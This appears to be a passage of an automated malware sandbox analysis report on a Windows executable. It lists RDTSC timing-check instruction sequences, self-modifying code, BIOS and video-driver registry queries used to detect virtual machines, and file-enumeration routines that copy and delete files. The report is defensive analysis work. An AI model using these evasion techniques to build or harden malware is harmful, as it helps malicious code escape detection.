              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833A26 second address: 833A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833B81 second address: 833B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833B85 second address: 833B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4F3C50B5DFh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833B9E second address: 833BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8345FA second address: 8345FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8345FE second address: 83460A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4F3CC87F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837F8C second address: 837F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837F96 second address: 837FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007F4F3CC87F7Ch 0x0000000b jng 00007F4F3CC87F76h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837FAD second address: 837FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84779A second address: 84779E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84779E second address: 8477AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856582 second address: 856593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnc 00007F4F3CC87F78h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856593 second address: 8565D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4F3C50B5E7h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F4F3C50B5E1h 0x00000015 jbe 00007F4F3C50B5E6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 859DCA second address: 859DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 859DD0 second address: 859DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 859DD4 second address: 859DE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F4F3CC87F76h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 859DE8 second address: 859E05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86ED6E second address: 86ED74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86DE46 second address: 86DE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86DE51 second address: 86DE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86DE55 second address: 86DE61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E586 second address: 86E58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E58A second address: 86E5AE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4F3C50B5D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d jl 00007F4F3C50B5F3h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4F3C50B5DFh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E5AE second address: 86E5B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E885 second address: 86E8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5DFh 0x00000009 jp 00007F4F3C50B5D6h 0x0000000f jc 00007F4F3C50B5D6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F4F3C50B5E3h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E8BC second address: 86E8C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E8C0 second address: 86E8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F4F3C50B5D6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E8D5 second address: 86E8EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F4F3CC87F81h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E8EC second address: 86E911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F4F3C50B5D6h 0x00000009 jmp 00007F4F3C50B5E8h 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86EA65 second address: 86EA6F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4F3CC87F76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870493 second address: 8704B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5DFh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jp 00007F4F3C50B5D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872F23 second address: 872F29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873249 second address: 873252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874784 second address: 87479B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87479B second address: 8747BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5E8h 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8747BD second address: 8747C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4F3CC87F76h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87654C second address: 876550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876550 second address: 876556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0396 second address: 4EE03D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov esi, 2E56F65Bh 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov bx, cx 0x00000011 pushfd 0x00000012 jmp 00007F4F3C50B5E8h 0x00000017 and cl, 00000058h 0x0000001a jmp 00007F4F3C50B5DBh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE03D7 second address: 4EE03DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE03DB second address: 4EE03ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE03ED second address: 4EE0427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5312D364h 0x00000008 pushfd 0x00000009 jmp 00007F4F3CC87F7Dh 0x0000000e jmp 00007F4F3CC87F7Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4F3CC87F80h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0427 second address: 4EE042D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE042D second address: 4EE0434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0434 second address: 4EE0443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, 8Fh 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE048D second address: 4EE049D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F3CC87F7Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE049D second address: 4EE04A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE04A1 second address: 4EE04DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a call 00007F4F3CC87F7Ah 0x0000000f pushfd 0x00000010 jmp 00007F4F3CC87F82h 0x00000015 sbb ax, 36C8h 0x0000001a jmp 00007F4F3CC87F7Bh 0x0000001f popfd 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE04DE second address: 4EE04E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE04E2 second address: 4EE04F3 instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE04F3 second address: 4EE04F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE04F7 second address: 4EE050F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE050F second address: 4EE0554 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4F3C50B5E1h 0x00000009 sbb esi, 108D8146h 0x0000000f jmp 00007F4F3C50B5E1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4F3C50B5DFh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0554 second address: 4EE055A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE055A second address: 4EE0560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0560 second address: 4EE0564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7892CE second address: 7892DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4F3C50B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7892DB second address: 7892E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7892E1 second address: 7892F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jc 00007F4F3C50B5E4h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5DFC17 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5DD362 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7A3DA1 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5DFB34 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 78DB09 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 806AD8 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27551
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-27624
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003A18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003AE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003AE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003A4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003A23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0039DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_003A2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0039DB80
